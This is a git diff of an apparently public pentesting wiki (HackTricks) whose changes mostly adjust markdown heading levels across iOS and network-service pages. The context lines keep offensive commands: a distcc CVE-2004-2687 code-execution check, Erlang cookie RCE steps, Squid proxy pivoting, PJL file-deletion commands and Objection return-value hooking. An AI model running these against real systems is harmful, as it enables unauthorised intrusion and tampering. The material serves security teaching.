@@ -32,13 +34,13 @@ cd FileDp-Source python filedp.py /path/to/check ``` -## **The Keychain** +### **The Keychain** In iOS, a **Keychain** serves as a secure **encrypted container** for storing **sensitive information**, accessible only by the application that stored it or those explicitly authorized. This encryption is fortified by a unique **password generated by iOS**, which itself is encrypted with **AES**. This encryption process leverages a **PBKDF2 function**, combining the user's passcode with a salt derived from the device's **UID**, a component only the **secure enclave chipset** can access. Consequently, even if the user's passcode is known, the Keychain contents remain inaccessible on any device other than the one where they were originally encrypted. **Management and access** to the Keychain data are handled by the **`securityd` daemon**, based on specific app entitlements like `Keychain-access-groups` and `application-identifier`. -### **Keychain API Operations** +#### **Keychain API Operations** The Keychain API, detailed at [Apple's Keychain Services documentation](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), provides essential functions for secure storage management: 
@@ -49,7 +51,7 @@ The Keychain API, detailed at [Apple's Keychain Services documentation](https:// Brute-forcing the Keychain password involves either attacking the encrypted key directly or attempting to guess the passcode on the device itself, hindered significantly by secure enclave's enforcement of a delay between failed attempts. -### **Configuring Keychain Item Data Protection** +#### **Configuring Keychain Item Data Protection** Data protection levels for Keychain items are set using the `kSecAttrAccessible` attribute during item creation or update. These levels, [as specified by Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), determine when and how Keychain items are accessible: @@ -63,12 +65,12 @@ Data protection levels for Keychain items are set using the `kSecAttrAccessible` **`AccessControlFlags`** further refine access methods, allowing for biometric authentication or passcode use. -### **Jailbroken Devices Warning** +#### **Jailbroken Devices Warning** > [!WARNING] > On **jailbroken devices**, the Keychain's protections are compromised, posing a significant security risk. -### **Persistence of Keychain Data** +#### **Persistence of Keychain Data** Unlike app-specific data deleted upon app uninstallation, **Keychain data persists** on the device. This characteristic could enable new owners of a second-hand device to access the previous owner's application data simply by reinstalling apps. Developers are advised to proactively clear Keychain data upon app installation or during logout to mitigate this risk. Here's a Swift code example demonstrating how to clear Keychain data upon the first app launch: 
@@ -84,7 +86,7 @@ if userDefaults.bool(forKey: "hasRunBefore") == false { } ``` -# **App Capabilities** +## **App Capabilities** In the realm of app development, **sandboxing** plays a crucial role in enhancing security. This process ensures that each app operates within its own unique home directory, thus preventing it from accessing system files or data belonging to other apps. The enforcement of these restrictions is carried out through sandbox policies, which are a part of the **Trusted BSD (MAC) Mandatory Access Control Framework**. @@ -111,7 +113,7 @@ For example, the purpose strings in the `Info.plist` file might look like this: Your location is used to provide turn-by-turn directions to your destination. ``` -## Device Capabilities +### Device Capabilities The `Info.plist` file of an app specifies **device capabilities** that help the App Store filter apps for device compatibility. These are defined under the **`UIRequiredDeviceCapabilities`** key. For instance: 
@@ -124,11 +126,11 @@ The `Info.plist` file of an app specifies **device capabilities** that help the This example indicates that the app is compatible with the armv7 instruction set. Developers may also specify capabilities like nfc to ensure their app is only available to devices supporting NFC. -## Entitlements +### Entitlements **Entitlements** are another critical aspect of iOS app development, serving as key-value pairs that grant apps permission to perform certain operations beyond runtime checks. For example, enabling **Data Protection** in an app involves adding a specific entitlement in the Xcode project, which is then reflected in the app's entitlements file or the embedded mobile provision file for IPAs. -# References +## References - [https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage](https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage) - [https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md) diff --git a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md index 22843155d..bc2e13ad0 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -1,3 +1,5 @@ +# iOS Hooking with Objection + {{#include ../../banners/hacktricks-training.md}} For this section the tool [**Objection**](https://github.com/sensepost/objection) is going to be used.\ @@ -10,9 +12,9 @@ objection -d --gadget "OWASP.iGoat-Swift" explore You can execute also `frida-ps -Uia` to check the running processes of the phone. -# Basic Enumeration of the app +## Basic Enumeration of the app -## Local App Paths +### Local App Paths - `env`: Find the paths where the application is stored inside the device 
@@ -27,7 +29,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library ``` -## List Bundles, frameworks and libraries +### List Bundles, frameworks and libraries - `ios bundles list_bundles`: List bundles of the application @@ -108,7 +110,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [..] ``` -## List classes of an APP +### List classes of an APP - `ios hooking list classes`: List classes of the app @@ -147,7 +149,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [...] ``` -## List class methods +### List class methods - `ios hooking list class_methods`: List methods of a specific class @@ -181,11 +183,11 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] ``` -# Basic Hooking +## Basic Hooking Now that you have **enumerated the classes and modules** used by the application you may have found some **interesting class and method names**. -## Hook all methods of a class +### Hook all methods of a class - `ios hooking watch class `: Hook all the methods of a class, dump all the initial parameters and returns @@ -193,7 +195,7 @@ Now that you have **enumerated the classes and modules** used by the application ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController ``` -## Hook a single method +### Hook a single method - `ios hooking watch method "-[ ]" --dump-args --dump-return --dump-backtrace`: Hook an specific method of a class dumping the parameters, backtraces and returns of the method each time it's called 
@@ -201,7 +203,7 @@ Now that you have **enumerated the classes and modules** used by the application ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return ``` -## Change Boolean Return +### Change Boolean Return - `ios hooking set return_value "-[ ]" false`: This will make the selected method return the indicated boolean @@ -209,7 +211,7 @@ Now that you have **enumerated the classes and modules** used by the application ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false ``` -## Generate hooking template +### Generate hooking template - `ios hooking generate simple `: diff --git a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md index 7c6d90a93..ec81a1ed4 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md +++ b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md @@ -1,8 +1,9 @@ -{{#include ../../banners/hacktricks-training.md}} - # WebView Protocol Handlers {{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md index f19c2ec49..482b0573a 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md +++ b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md @@ -1,3 +1,5 @@ +# iOS Serialisation and Encoding + {{#include ../../banners/hacktricks-training.md}} Code and more information in [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence). 
diff --git a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index 7227b86d9..df8aba3d6 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -1,3 +1,5 @@ +# iOS Pasteboard + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index d6d83dc0b..a2f492745 100644 --- a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -1,6 +1,8 @@ +# 10000/tcp - Network Data Management Protocol (NDMP) + {{#include ../banners/hacktricks-training.md}} -# **Protocol Information** +## **Protocol Information** From [Wikipedia](https://en.wikipedia.org/wiki/NDMP): @@ -13,7 +15,7 @@ PORT STATE SERVICE REASON VERSION 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp ``` -# **Enumeration** +## **Enumeration** ```bash nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are default scripts diff --git a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index 20f03d16e..f1f8fa2ef 100644 --- a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md 
@@ -1,6 +1,8 @@ +# 24007-24008-24009-49152 - Pentesting GlusterFS + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers. diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md index d1bebeb63..76c46637c 100644 --- a/src/network-services-pentesting/3128-pentesting-squid.md +++ b/src/network-services-pentesting/3128-pentesting-squid.md @@ -1,6 +1,8 @@ +# 3128/tcp - Pentesting Squid + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information From [Wikipedia](): @@ -13,9 +15,9 @@ PORT STATE SERVICE VERSION 3128/tcp open http-proxy Squid http proxy 4.11 ``` -# Enumeration +## Enumeration -## Web Proxy +### Web Proxy You can try to set this discovered service as proxy in your browser. However, if it's configured with HTTP authentication you will be prompted for usernames and password. @@ -24,7 +26,7 @@ You can try to set this discovered service as proxy in your browser. However, if curl --proxy http://10.10.11.131:3128 http://10.10.11.131 ``` -## Nmap proxified +### Nmap proxified You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\ Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file: `http 10.10.10.10 3128` 
@@ -32,7 +34,7 @@ For proxies requiring authentication, append credentials to the configuration by Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost` -## SPOSE Scanner +### SPOSE Scanner Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) can be used. diff --git a/src/network-services-pentesting/3299-pentesting-saprouter.md b/src/network-services-pentesting/3299-pentesting-saprouter.md index 4cafbd87b..4ec122c14 100644 --- a/src/network-services-pentesting/3299-pentesting-saprouter.md +++ b/src/network-services-pentesting/3299-pentesting-saprouter.md @@ -1,3 +1,5 @@ +# # 3299/tcp - Pentesting SAProuter + {{#include ../banners/hacktricks-training.md}} ```text diff --git a/src/network-services-pentesting/3632-pentesting-distcc.md b/src/network-services-pentesting/3632-pentesting-distcc.md index 36f188987..254b84834 100644 --- a/src/network-services-pentesting/3632-pentesting-distcc.md +++ b/src/network-services-pentesting/3632-pentesting-distcc.md @@ -1,6 +1,8 @@ +# 3632 - Pentesting Distcc + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information **Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code. @@ -11,7 +13,7 @@ PORT STATE SERVICE 3632/tcp open distccd ``` -# Exploitation +## Exploitation Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: 
@@ -20,11 +22,11 @@ msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` -# Shodan +## Shodan _I don't think shodan detects this service._ -# Resources +## Resources - [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) - [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) diff --git a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 80b9df44c..85ced3ea7 100644 --- a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -1,6 +1,8 @@ +# 3690/tcp - Pentesting Subversion (SVN) Server + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information **Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently. @@ -11,7 +13,7 @@ PORT STATE SERVICE 3690/tcp open svnserve Subversion ``` -## Banner Grabbing +### Banner Grabbing ``` nc -vn 10.10.10.10 3690 diff --git a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md index ca7be3409..75eb61f2a 100644 --- a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md +++ b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md 
@@ -1,6 +1,8 @@ +# 4369 Pentesting Erlang Port Mapper Daemon (epmd) + {{#include ../banners/hacktricks-training.md}} -# Basic Info +## Basic Info The **Erlang Port Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network. @@ -13,9 +15,9 @@ PORT STATE SERVICE VERSION This is used by default on RabbitMQ and CouchDB installations. -# Enumeration +## Enumeration -## Manual +### Manual ```bash echo -n -e "\x00\x01\x6e" | nc -vn 4369 @@ -27,7 +29,7 @@ erl #Once Erlang is installed this will promp an erlang terminal 1> net_adm:names(''). #This will return the listen addresses ``` -## Automatic +### Automatic ```bash nmap -sV -Pn -n -T4 -p 4369 --script epmd-info @@ -44,9 +46,9 @@ PORT STATE SERVICE VERSION |_ kazoo-rabbitmq: 25672 ``` -# Erlang Cookie RCE +## Erlang Cookie RCE -## Remote Connection +### Remote Connection If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z] with a length of 20 characters. @@ -69,7 +71,7 @@ The author also share a program to brutforce the cookie: epmd_bf-0.1.tar.bz2 {{#endfile}} -## Local Connection +### Local Connection In this case we are going to abuse CouchDB to escalate privileges locally: 
@@ -83,14 +85,14 @@ HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ You can use **Canape HTB machine to** **practice** how to **exploit this vuln**. -## Metasploit +### Metasploit ```bash #Metasploit can also exploit this if you know the cookie msf5> use exploit/multi/misc/erlang_cookie_rce ``` -# Shodan +## Shodan - `port:4369 "at port"` diff --git a/src/network-services-pentesting/44134-pentesting-tiller-helm.md b/src/network-services-pentesting/44134-pentesting-tiller-helm.md index 5177d45f6..4e34a16a2 100644 --- a/src/network-services-pentesting/44134-pentesting-tiller-helm.md +++ b/src/network-services-pentesting/44134-pentesting-tiller-helm.md @@ -1,6 +1,8 @@ +# 44134 Tiller / Helm + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service. @@ -11,7 +13,7 @@ PORT STATE SERVICE VERSION 44134/tcp open unknown ``` -# Enumeration +## Enumeration If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**: @@ -52,7 +54,7 @@ Then, you can **enumerate the service**: helm --host tiller-deploy.kube-system:44134 version ``` -## Privilege Escalation +### Privilege Escalation By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**. diff --git a/src/network-services-pentesting/44818-ethernetip.md b/src/network-services-pentesting/44818-ethernetip.md index 24b044a21..325ff3d66 100644 
--- a/src/network-services-pentesting/44818-ethernetip.md +++ b/src/network-services-pentesting/44818-ethernetip.md @@ -1,6 +1,8 @@ +# 44818 Pentesting EtherNet/IP + {{#include ../banners/hacktricks-training.md}} -# **Protocol Information** +## **Protocol Information** EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**. @@ -11,7 +13,7 @@ PORT STATE SERVICE 44818/tcp open EtherNet/IP ``` -# **Enumeration** +## **Enumeration** ```bash nmap -n -sV --script enip-info -p 44818 @@ -19,7 +21,7 @@ pip3 install cpppo python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a ``` -# Shodan +## Shodan - `port:44818 "product name"` diff --git a/src/network-services-pentesting/47808-udp-bacnet.md b/src/network-services-pentesting/47808-udp-bacnet.md index 07c70a0c0..a6518aefc 100644 --- a/src/network-services-pentesting/47808-udp-bacnet.md +++ b/src/network-services-pentesting/47808-udp-bacnet.md 
@@ -1,6 +1,8 @@ +# 47808/udp - BACnet + {{#include ../banners/hacktricks-training.md}} -# Protocol Information +## Protocol Information **BACnet** is a **communications protocol** for Building Automation and Control (BAC) networks that leverages the **ASHRAE**, **ANSI**, and **ISO 16484-5 standard** protocol. It facilitates communication among building automation and control systems, enabling applications such as HVAC control, lighting control, access control, and fire detection systems to exchange information. BACnet ensures interoperability and allows computerized building automation devices to communicate, regardless of the specific services they provide. @@ -11,9 +13,9 @@ PORT STATE SERVICE 47808/udp open BACNet -- Building Automation and Control NetworksEnumerate ``` -# Enumeration +## Enumeration -## Manual +### Manual ```bash pip3 install BAC0 @@ -37,7 +39,7 @@ for i, (deviceId, companyId, devIp, numDeviceId) in enumerate(bacnet.devices): # print(readDevice) #List all available info about the device ``` -## Automatic +### Automatic ```bash nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 @@ -45,7 +47,7 @@ nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device. -## Shodan +### Shodan - `port:47808 instance` - `"Instance ID" "Vendor Name"` diff --git a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index 7439e81be..d0e58be0a 100644 --- a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md 
@@ -1,6 +1,8 @@ +# 50030-50060-50070-50075-50090 - Pentesting Hadoop + {{#include ../banners/hacktricks-training.md}} -# **Basic Information** +## **Basic Information** **Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing. diff --git a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 1e93a5890..6e72240df 100644 --- a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md 
@@ -1,10 +1,12 @@ +# 515 Pentesting Line Printer Daemon (LPD) + {{#include ../banners/hacktricks-training.md}} -### **Introduction to LPD Protocol** +## **Introduction to LPD Protocol** In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. -### **Tools for Interacting with LPD Printers** +## **Tools for Interacting with LPD Printers** [**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: @@ -25,7 +27,7 @@ lpdtest.py hostname mail lpdtest@mailhost.local For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). -# Shodan +## Shodan - `port 515` diff --git a/src/network-services-pentesting/5601-pentesting-kibana.md b/src/network-services-pentesting/5601-pentesting-kibana.md index 8ef011e3f..b59365414 100644 --- a/src/network-services-pentesting/5601-pentesting-kibana.md +++ b/src/network-services-pentesting/5601-pentesting-kibana.md 
@@ -1,14 +1,16 @@ +# 5601/tcp - Pentesting Kibana + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions. -## Understanding Authentication +### Understanding Authentication The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index. -## Actions Upon Access +### Actions Upon Access Once access to Kibana is secured, several actions are advisable: @@ -16,7 +18,7 @@ Once access to Kibana is secured, several actions are advisable: - The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys. - It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/index.html#ref2)). -## SSL/TLS Considerations +### SSL/TLS Considerations In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s diff --git a/src/network-services-pentesting/69-udp-tftp.md b/src/network-services-pentesting/69-udp-tftp.md index 2b97a8897..6daf35d85 100644 
--- a/src/network-services-pentesting/69-udp-tftp.md +++ b/src/network-services-pentesting/69-udp-tftp.md @@ -1,7 +1,8 @@ +# 69 - UDP TFTP + {{#include ../banners/hacktricks-training.md}} - -# Basic Information +## Basic Information **Trivial File Transfer Protocol (TFTP)** is a straightforward protocol used on **UDP port 69** that allows file transfers without needing authentication. Highlighted in **RFC 1350**, its simplicity means it lacks key security features, leading to limited use on the public Internet. However, **TFTP** is extensively utilized within large internal networks for distributing **configuration files** and **ROM images** to devices such as **VoIP handsets**, thanks to its efficiency in these specific scenarios. @@ -14,7 +15,7 @@ PORT STATE SERVICE REASON 69/udp open tftp script-set ``` -# Enumeration +## Enumeration TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` will try to brute-force default paths. @@ -22,7 +23,7 @@ TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` wil nmap -n -Pn -sU -p69 -sV --script tftp-enum ``` -## Download/Upload +### Download/Upload You can use Metasploit or Python to check if you can download/upload files: @@ -37,7 +38,7 @@ client.download("filename in server", "/tmp/filename", timeout=5) client.upload("filename to upload", "/local/path/file", timeout=5) ``` -## Shodan +### Shodan - `port:69` diff --git a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md index a652d2f86..954c762d4 100644 --- a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md 
@@ -1,6 +1,8 @@ +# 7/tcp/udp - Pentesting Echo Service + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information An echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.\ **It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.\ diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md index 64ddebc5f..0018e3a7e 100644 --- a/src/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md @@ -1,6 +1,8 @@ +# 9000 Pentesting FastCGI + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information If you want to **learn what is FastCGI** check the following page: @@ -10,7 +12,7 @@ pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedi By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**. -# RCE +## RCE It's quite easy to make FastCGI execute arbitrary code: diff --git a/src/network-services-pentesting/9001-pentesting-hsqldb.md b/src/network-services-pentesting/9001-pentesting-hsqldb.md index d80671618..37b2962d5 100644 --- a/src/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/src/network-services-pentesting/9001-pentesting-hsqldb.md 
@@ -1,6 +1,8 @@ -{{#include ../banners/hacktricks-training.md}} +# 9001 - Pentesting HSQLDB -# Basic Information +## Basic Information + +{{#include ../banners/hacktricks-training.md}} **HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. @@ -10,9 +12,7 @@ 9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) ``` -# Information - -### Default Settings +## Default Settings Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges. @@ -26,15 +26,15 @@ grep -rP 'jdbc:hsqldb.*password.*' /path/to/search Note the database name carefully - you’ll need it to connect. -# Info Gathering +## Info Gathering Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials. Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`. -# Tricks +## Tricks -## Java Language Routines +### Java Language Routines We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath. @@ -42,7 +42,7 @@ JRTs can be `functions` or `procedures`. Functions can be called via SQL stateme If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement. -## Reading Java System Properties +### Reading Java System Properties Create function: 
@@ -60,7 +60,7 @@ VALUES(getsystemproperty('user.name')) You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). -## Write Content to File +### Write Content to File You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**. diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index d81184531..e060528da 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -1,6 +1,8 @@ +# 9100/tcp - PJL (Printer Job Language) + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information From [here](http://hacking-printers.net/wiki/index.php/Port_9100_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. 
@@ -12,9 +14,9 @@ If you want to learn more about [**hacking printers read this page**](http://hac 9100/tcp open jetdirect ``` -# Enumeration +## Enumeration -## Manual +### Manual ```bash nc -vn 9100 @@ -33,7 +35,7 @@ nc -vn 9100 @PJL FSDELETE #Useful to delete a file ``` -## Automatic +### Automatic ```bash nmap -sV --script pjl-ready-message -p @@ -58,7 +60,7 @@ This is the tool you want to use to abuse printers: https://github.com/RUB-NDS/PRET {{#endref}} -# **Shodan** +## **Shodan** - `pjl port:9100` diff --git a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md index bb4312b95..470ad8ba0 100644 --- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md +++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md @@ -1,8 +1,10 @@ +# # 264/tcp - Pentesting Check Point Firewall + {{#include ../banners/hacktricks-training.md}} It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a 